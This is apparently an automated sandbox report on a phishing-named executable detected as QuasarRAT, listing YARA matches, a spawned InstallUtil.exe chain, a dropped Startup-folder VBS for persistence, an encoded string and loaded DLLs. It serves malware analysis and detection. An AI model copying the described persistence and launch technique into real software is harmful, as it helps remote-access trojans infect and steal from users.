                    Source: Yara match File source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3624, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3632, type: MEMORYSTR

                    System Summary

                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE Matched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE Matched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar infostealer Author: ditekshen
                    Source: initial sample Static PE information: Filename: Order88983273293729387293828PDF.exe
                    Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00DFF9D00_2_00DFF9D0
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00DFDDF00_2_00DFDDF0
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00DFDE000_2_00DFDE00
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_047F5A180_2_047F5A18
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_047F5A080_2_047F5A08
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072EE5280_2_072EE528
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072D001F0_2_072D001F
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072D00400_2_072D0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0268EFE41_2_0268EFE4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_078CA7101_2_078CA710
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_078C6D881_2_078C6D88
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_032741203_2_03274120
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_0327F9D03_2_0327F9D0
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_0327DE003_2_0327DE00
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_0327DDF03_2_0327DDF0
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_0546597F3_2_0546597F
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_07F1E5283_2_07F1E528
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_07F000403_2_07F00040
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_07F000063_2_07F00006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0164F03C5_2_0164F03C
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePjpeajx.exe0 vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePjpeajx.exe0 vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1714381177.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe Binary or memory string: OriginalFilenamePjpeajx.exe0 vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: Order88983273293729387293828PDF.exe, -.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Order88983273293729387293828PDF.exe.38d0890.6.raw.unpack, -.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: Order88983273293729387293828PDF.exe, -.csBase64 encoded string: 'iHuxp8Ap9VCntckhuHarvMtqmnGxtsgmt3v5lMAwnmy2odwFqHGnvscoojmlttEbnXeuv+sltmf5vNUbkmynotAlt2u2qp4jvnadn8AqvHaq6OIhr1a7o8ACqW2vm8Qqv26n6MIhr12Mssgh4Eust8A8lGT5gcAlv1G2ocwqvDmDt8F/vGe2jPUrqGu2usoq4GWnp/oHrnCwtsswn22vsswq4FGnp+Elr2P565d96zmDoNYhtmCuqvYhqXSnoZ4Xsm+yv8AFqHGnvscooke6o8krqWew6McluWeupch/qG+tuMAwvnG2'
                    Source: 0.2.Order88983273293729387293828PDF.exe.38d0890.6.raw.unpack, -.csBase64 encoded string: 'iHuxp8Ap9VCntckhuHarvMtqmnGxtsgmt3v5lMAwnmy2odwFqHGnvscoojmlttEbnXeuv+sltmf5vNUbkmynotAlt2u2qp4jvnadn8AqvHaq6OIhr1a7o8ACqW2vm8Qqv26n6MIhr12Mssgh4Eust8A8lGT5gcAlv1G2ocwqvDmDt8F/vGe2jPUrqGu2usoq4GWnp/oHrnCwtsswn22vsswq4FGnp+Elr2P565d96zmDoNYhtmCuqvYhqXSnoZ4Xsm+yv8AFqHGnvscooke6o8krqWew6McluWeupch/qG+tuMAwvnG2'
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1714381177.0000000000B19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TPConfigSnapshot.snp.VBP
                    Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@8/6@3/3
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\3302836a-f2f9-4646-981e-42b54ed610dd
                    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs"
                    Source: Order88983273293729387293828PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Order88983273293729387293828PDF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 * FROM {0};
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE ROWID = last_insert_rowid();
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: SELECT @countGroupBy AS [countGroupBy], @count AS [count]PDELETE FROM @(Model.TemporaryTableName);RDELETE FROM @@(Model.TemporaryTableName);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);DELETE FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT [PK_@(Model.TemporaryTableNamePK)] PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoinMerge)) OR ROWID = last_insert_rowid();
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;'Oracle.DataAccess.Client.OracleBulkCopy%Microsoft.Data.SqlClient.SqlParameter
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: INSERT INTO @(Model.DestinationTableName) ( @(Model.InsertColumnNames) ) VALUES ( @(Model.InsertStagingNames) );
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) );
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoin)) OR ROWID = last_insert_rowid();
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT * FROM {0} LIMIT 0;
                    Source: Order88983273293729387293828PDF.exe ReversingLabs: Detection: 31%
                    Source: Order88983273293729387293828PDF.exe Virustotal: Detection: 35%
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe File read: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                    Source: unknown Process created: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe"
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\MaxGeneration.exe "C:\Users\user\AppData\Roaming\MaxGeneration.exe"
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\MaxGeneration.exe "C:\Users\user\AppData\Roaming\MaxGeneration.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasapi32.dllJump to behavior
